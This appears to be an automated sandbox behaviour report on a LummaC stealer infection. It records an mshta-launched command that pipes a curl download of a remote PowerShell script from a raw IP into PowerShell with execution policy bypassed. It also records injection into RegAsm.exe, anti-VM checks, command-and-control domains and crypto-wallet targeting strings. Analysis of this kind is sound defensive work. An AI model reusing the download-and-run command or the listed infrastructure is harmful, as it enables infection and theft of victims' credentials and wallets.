Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Binary string: $^q7C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.pdb source: powershell.exe, 00000005.00000002.1737453939.0000000005224000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh	8_2_0043D812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00443469 push ebp; iretd	8_2_0044346C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0044366E push 9F00CD97h; ret	8_2_004436B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h	8_2_0043AE3E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5406			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4373			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224	Thread sleep count: 5406 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224	Thread sleep count: 4373 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7448	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: RegAsm.exe, 00000008.00000002.1937052782.0000000001075000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX5
Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWm
Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.1742888917.00000000076B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll++HF
Source: curl.exe, 00000004.00000003.1694791209.0000000003490000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_0043C1F0 LdrInitializeThunk,

8_2_0043C1F0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 5.2.powershell.exe.525556c.0.raw.unpack, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 5.2.powershell.exe.525556c.0.raw.unpack, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 5.2.powershell.exe.525556c.0.raw.unpack, Engineers.cs	Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.0.cs

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D42008	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1090.tmp" "c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010A0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: RegAsm.exe, 00000008.00000002.1937052782.0000000001103000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihk
Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegAsm.exe, 00000008.00000002.1937052782.000000000110B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
